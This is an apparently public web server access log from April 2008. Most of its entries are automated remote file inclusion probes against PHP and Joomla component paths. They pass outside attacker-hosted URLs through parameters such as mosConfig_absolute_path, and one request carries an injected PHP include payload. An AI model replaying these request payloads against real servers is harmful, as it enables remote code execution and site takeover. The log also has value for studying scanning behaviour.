67.19.107.122 - - [30/Apr/2008:11:02:47 -0700] "GET /logs/access_071224.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:02:48 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:02:59 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:03:00 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:03:00 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:11:03:00 -0700] "GET /logs/access_071224.log/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:11:03:00 -0700] "GET /modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:11:03:00 -0700] "GET /logs/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [30/Apr/2008:11:03:00 -0700] "GET /logs/access_080106.log/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
24.13.122.223 - - [30/Apr/2008:11:03:05 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.13.122.223 - - [30/Apr/2008:11:03:05 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.13.122.223 - - [30/Apr/2008:11:03:06 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:03:09 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:03:09 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:11:03:09 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.13.122.223 - - [30/Apr/2008:11:03:13 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:11:03:15 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:11:03:15 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:11:03:16 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.13.122.223 - - [30/Apr/2008:11:03:18 -0700] "GET /errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.13.122.223 - - [30/Apr/2008:11:03:18 -0700] "GET /logs/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.254.243.74 - - [30/Apr/2008:11:03:35 -0700] "GET /logs/access_080222.log/!scanftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:11:03:42 -0700] "GET /logs/access_071224.log/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:11:03:42 -0700] "GET /modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:11:03:42 -0700] "GET /logs/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:11:03:43 -0700] "GET /logs/access_080106.log/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:04:07 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:04:07 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:04:08 -0700] "GET /logs/page.php5?id=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:04:08 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:04:08 -0700] "GET /page.php5?id=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:04:09 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:04:10 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:04:11 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:11:04:35 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.13.98.174 - - [30/Apr/2008:11:04:39 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hulhanet.com.br/adilamar/entrevistas/data/.st/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
204.13.98.174 - - [30/Apr/2008:11:04:40 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hulhanet.com.br/adilamar/entrevistas/data/.st/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:04:40 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:04:40 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:11:04:50 -0700] "GET /logs/access_071224.log/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:11:04:50 -0700] "GET /modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:11:04:51 -0700] "GET /logs/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:11:04:51 -0700] "GET /logs/access_080106.log/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [30/Apr/2008:11:05:01 -0700] "GET /logs/access_080220.log//newspublish/include.php?path%5Bdocroot%5D=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:05:36 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:05:37 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.165.216.146 - - [30/Apr/2008:11:05:40 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://glycol.ca/languages/.../test2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
68.165.216.146 - - [30/Apr/2008:11:05:40 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://glycol.ca/languages/.../test2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
71.170.251.132 - - [30/Apr/2008:11:05:42 -0700] "GET /logs/access_071017.log HTTP/1.1" 200 21727 "http://search.yahoo.com/search?p=NET%2BCLR%2B3.0.04506%3B%2B.NET%2BCLR%2B1.1.4322%29+403+14+5&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; ZangoToolbar 4.8.3; InfoPath.1)" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:05:50 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:11:05:56 -0700] "GET /SQuery/lib/gore.php?libpath=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.132 - - [30/Apr/2008:11:05:56 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.jaadventure.com.br/administrator/safeon.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:06:19 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:06:19 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:06:19 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:06:22 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.49.26 - - [30/Apr/2008:11:06:22 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:06:23 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:06:23 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:06:23 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:06:27 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:06:28 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:06:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.13.122.223 - - [30/Apr/2008:11:06:34 -0700] "GET /logs/access_071224.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:11:06:40 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:11:06:40 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.13.122.223 - - [30/Apr/2008:11:06:43 -0700] "GET /logs/access_071224.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:06:54 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:07:03 -0700] "GET /logs/access_071224.log/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:07:04 -0700] "GET /modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:11:07:04 -0700] "GET /about.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
69.22.162.60 - - [30/Apr/2008:11:07:04 -0700] "GET /logs/about.php?mosConfig_absolute_path=http://fadhilla.com/program/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:07:05 -0700] "GET /logs/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:07:08 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [30/Apr/2008:11:07:08 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:07:09 -0700] "GET /logs/access_080106.log/modiform.html?code=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:07:14 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:07:15 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.71.124 - - [30/Apr/2008:11:07:15 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.95 - - [30/Apr/2008:11:07:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.95 - - [30/Apr/2008:11:07:40 -0700] "GET /logs/access_070710.log HTTP/1.0" 200 32027 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.110.147.194 - - [30/Apr/2008:11:07:50 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.110.147.194 - - [30/Apr/2008:11:07:51 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.86.192.2 - - [30/Apr/2008:11:08:21 -0700] "GET /homepage.php?sel=http://glycol.ca/languages/.../test2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.86.192.2 - - [30/Apr/2008:11:08:21 -0700] "GET /logs/homepage.php?sel=http://glycol.ca/languages/.../test2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:08:36 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:08:41 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:08:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:08:43 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.110.147.194 - - [30/Apr/2008:11:08:54 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://druidsutterance.net/templates/rt_technopia/css/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.122.243.226 - - [30/Apr/2008:11:09:23 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://212.115.13.140:82//appserv/r.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
195.122.243.226 - - [30/Apr/2008:11:09:24 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://212.115.13.140:82//appserv/r.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.58.161.77 - - [30/Apr/2008:11:09:29 -0700] "GET /logs/db.php?path_local=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
207.58.161.77 - - [30/Apr/2008:11:09:29 -0700] "GET /db.php?path_local=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:09:34 -0700] "GET /logs/access_080309.log//newspublish/include.php?path%5Bdocroot%5D=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:09:59 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:11:10:01 -0700] "GET /!scanftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.63.16.134 - - [30/Apr/2008:11:10:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.166.35.71 - - [30/Apr/2008:11:10:33 -0700] "GET /logs/access_071219.log/errors.php?error=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.63.16.134 - - [30/Apr/2008:11:10:38 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://contactcraze.com/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [30/Apr/2008:11:11:05 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:11:05 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.49.157 - - [30/Apr/2008:11:11:17 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
190.54.49.157 - - [30/Apr/2008:11:11:21 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:11:53 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:11:56 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:11:57 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:11:58 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.192.249 - - [30/Apr/2008:11:11:59 -0700] "GET /logs//com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.192.249 - - [30/Apr/2008:11:11:59 -0700] "GET //com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.festhall.com.br/galeria//_files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:12:00 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:11:12:01 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:12:07 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:12:12 -0700] "GET /encoder.php?base_dir=phpsyncmlhttp://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:11:12:13 -0700] "GET /logs/encoder.php?base_dir=phpsyncmlhttp://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
